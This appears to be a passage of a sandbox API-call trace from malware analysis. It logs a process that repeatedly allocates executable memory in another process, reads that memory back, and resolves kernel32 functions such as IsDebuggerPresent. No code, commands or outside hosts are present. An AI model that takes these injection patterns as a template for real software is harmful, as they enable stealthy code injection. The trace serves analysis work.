VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.680] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c360 | out: hHeap=0x2150000) returned 1 [0176.680] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.681] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.682] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.682] lstrlenA (lpString="SetFilePointerEx") returned 16 [0176.682] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.682] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.682] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cc90 [0176.682] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.683] ResetEvent (hEvent=0x580) returned 1 [0176.683] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.683] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.683] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.683] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cc90 | out: hHeap=0x2150000) returned 1 [0176.683] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.685] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.685] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.685] lstrlenA (lpString="WriteConsoleW") returned 13 [0176.685] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.685] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.685] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cbd0 [0176.685] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.686] ResetEvent (hEvent=0x580) returned 1 [0176.686] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.686] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.686] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.687] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cbd0 | out: hHeap=0x2150000) returned 1 [0176.687] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.688] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.688] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.688] lstrlenA (lpString="UnmapViewOfFile") returned 15 [0176.688] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.688] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.689] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c510 [0176.689] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.689] ResetEvent (hEvent=0x580) returned 1 [0176.689] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.689] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.690] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.690] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c510 | out: hHeap=0x2150000) returned 1 [0176.690] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.691] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.691] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.691] lstrlenA (lpString="FlushFileBuffers") returned 16 [0176.691] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.692] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.692] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cf30 [0176.692] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.692] ResetEvent (hEvent=0x580) returned 1 [0176.692] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.693] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.693] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.694] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cf30 | out: hHeap=0x2150000) returned 1 [0176.694] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.694] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.695] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.695] lstrlenA (lpString="RtlCaptureContext") returned 17 [0176.695] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.695] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.695] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c9f0 [0176.695] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.696] ResetEvent (hEvent=0x580) returned 1 [0176.696] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.696] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.696] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.696] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c9f0 | out: hHeap=0x2150000) returned 1 [0176.696] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.697] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.697] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.697] lstrlenA (lpString="RtlLookupFunctionEntry") returned 22 [0176.697] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x17, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.698] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.698] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cab0 [0176.698] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.699] ResetEvent (hEvent=0x580) returned 1 [0176.699] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.699] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.699] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.699] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cab0 | out: hHeap=0x2150000) returned 1 [0176.699] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.700] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.700] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.700] lstrlenA (lpString="RtlVirtualUnwind") returned 16 [0176.700] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.701] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.701] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cc90 [0176.701] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.701] ResetEvent (hEvent=0x580) returned 1 [0176.701] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.702] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.702] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.702] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cc90 | out: hHeap=0x2150000) returned 1 [0176.702] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.704] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.704] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.704] lstrlenA (lpString="IsDebuggerPresent") returned 17 [0176.704] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.704] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.704] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c510 [0176.704] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.705] ResetEvent (hEvent=0x580) returned 1 [0176.705] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.705] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.705] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.706] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c510 | out: hHeap=0x2150000) returned 1 [0176.706] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.707] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.707] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.707] lstrlenA (lpString="UnhandledExceptionFilter") returned 24 [0176.707] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x19, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.707] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.708] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cb70 [0176.708] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.708] ResetEvent (hEvent=0x580) returned 1 [0176.708] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.708] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.709] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.709] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cb70 | out: hHeap=0x2150000) returned 1 [0176.709] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.710] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.710] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.710] lstrlenA (lpString="SetUnhandledExceptionFilter") returned 27 [0176.710] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.711] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.711] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c510 [0176.711] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.712] ResetEvent (hEvent=0x580) returned 1 [0176.712] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.712] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.712] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.712] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c510 | out: hHeap=0x2150000) returned 1 [0176.712] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.714] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.714] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.714] lstrlenA (lpString="GetStartupInfoW") returned 15 [0176.714] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.714] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.714] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c660 [0176.714] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.715] ResetEvent (hEvent=0x580) returned 1 [0176.715] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.715] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.715] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.715] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c660 | out: hHeap=0x2150000) returned 1 [0176.715] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.718] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.718] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.718] lstrlenA (lpString="IsProcessorFeaturePresent") returned 25 [0176.718] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.718] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.718] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c660 [0176.718] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.719] ResetEvent (hEvent=0x580) returned 1 [0176.719] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.719] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.720] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.720] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c660 | out: hHeap=0x2150000) returned 1 [0176.720] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.721] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.721] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.721] lstrlenA (lpString="GetModuleHandleW") returned 16 [0176.721] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.722] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.722] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c870 [0176.722] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.723] ResetEvent (hEvent=0x580) returned 1 [0176.723] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.723] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.723] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.723] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c870 | out: hHeap=0x2150000) returned 1 [0176.723] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.725] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.725] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.725] lstrlenA (lpString="InitializeSListHead") returned 19 [0176.725] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.725] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.725] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c3f0 [0176.725] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.726] ResetEvent (hEvent=0x580) returned 1 [0176.726] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.726] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.726] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.726] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c3f0 | out: hHeap=0x2150000) returned 1 [0176.726] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.728] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.728] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.728] lstrlenA (lpString="RtlUnwindEx") returned 11 [0176.728] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.729] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.729] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c510 [0176.729] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.730] ResetEvent (hEvent=0x580) returned 1 [0176.730] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.730] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.730] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.731] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c510 | out: hHeap=0x2150000) returned 1 [0176.731] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.732] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.732] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.732] lstrlenA (lpString="RtlPcToFileHeader") returned 17 [0176.732] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.733] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.733] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c870 [0176.733] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.733] ResetEvent (hEvent=0x580) returned 1 [0176.733] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.734] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.734] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.734] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c870 | out: hHeap=0x2150000) returned 1 [0176.734] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.735] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.735] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.736] lstrlenA (lpString="RaiseException") returned 14 [0176.736] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 